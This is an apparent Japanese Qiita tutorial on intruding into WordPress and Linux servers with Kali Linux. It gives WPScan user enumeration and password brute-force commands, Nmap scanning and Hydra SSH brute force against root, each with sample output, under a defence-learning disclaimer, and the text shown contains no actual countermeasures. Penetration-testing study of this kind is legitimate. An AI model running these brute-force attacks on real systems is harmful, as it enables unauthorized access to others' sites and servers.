Help us understand the problem. What is going on with this article?

KaliLinuxによるWordPress改ざんとWebサーバ侵入から学ぶクラッキング対策

More than 3 years have passed since last update.

Kali Linuxとは

Kali Linuxは先進的なペネトレーションテスト(侵入試験)やセキュリティ監査を実施するためのLinuxのディストリビューションである。
KaliはBackTrack Linuxの完全なる後継であり、Debian をベースに開発されている。

引用元:KALI LINUX OFFICIAL DOCUMENTATION | http://ja.docs.kali.org/introduction-ja/kali-linux%E3%81%A8%E3%81%AF

攻撃の手口

※この投稿の趣旨は、攻撃者側の手口を学び、防御に役立てることにあります。
この投稿内容を基に、第三者が管理するサーバ等に攻撃を仕掛けないでください。
投稿内容を実行する場合は、閉じたネットワーク内にて、自己責任でお願いします。
もしも、第三者が管理するサーバ等に攻撃を仕掛けた場合、以下のリスクがあります。

・プロバイダから警告が来ます。
・不正アクセスで逮捕、逮捕されなくても拘留されます。
・企業から賠償金を請求されます。

引用元:攻撃者の心理 Kali Linux紹介 1 | http://sys-guard.com/post-2896/

WPScanによる偵察とクラッキング

1.WordPressの管理者ユーザ名を取得する。

# wpscan --url "http://www.example.com/" --enumerate u

[+] Identified the following 1 user/s:
    +----+---------------+-----------------+
    | Id | Login         | Name            |
    +----+---------------+-----------------+
    | 1  | admin         | admin ?         |
    +----+---------------+-----------------+

※上記のコマンドラインを実行中、以下の表示が出た際は、「N」を入力してEnterを押す。
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]N

2.WordPressの管理者パスワードをブルートフォースアタックによって取得する。

# wpscan --url "http://www.example.com/" --wordlist /root/passwordlist.txt --username admin

  +----+---------------+------+----------+
  | Id | Login         | Name | Password |
  +----+---------------+------+----------+
  |    | admin         |      | password |
  +----+---------------+------+----------+

※--wordlistで指定する辞書ファイルは、/root配下に自分で作成したテキストファイルを使用している。
辞書ファイルは、以下の3パターンによって入手できる。

※上記のコマンドラインを実行中、以下の表示が出た際は、「N」を入力してEnterを押す。
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]N

3.WordPressに侵入
Webブラウザに http://www.example.com/wp-login.php と入力し、WordPressのログイン画面を表示させる。
ユーザ名とパスワードを入力し、管理画面(ダッシュボード)に入ることができれば侵入完了。

Nmapによる偵察

# nmap -sP (Networkaddress)/(Subnetmask)
# nmap -A (IPaddress)

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)

※-sPでネットワーク内で稼働中のサーバを特定し、-Aでオープンなポートやサービスをスキャンする。

hydraによるSSHポートへのブルートフォースアタック

# hydra -L /root/userlist.txt -P /root/passwordlist.txt (IPaddress) ssh
[DATA] attacking service ssh on port 22
[22][ssh] host: (IPaddress)   login: root   password: acb123

サーバに対してSSHで接続し、rootのパスワードを入力して侵入する。

※-Lで指定するユーザクラック用辞書ファイルと、-Pで指定するパスワードクラック用辞書ファイルは、/root配下に自分で作成したテキストファイルを使用している。
辞書ファイルは、以下の3パターンによって入手できる。

参考文献

curryperformer-kato
インフラエンジニア(5年目)。BOOTHでWebアプリ開発やセキュリティの同人誌を頒布中。
https://webservice.booth.pm/
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away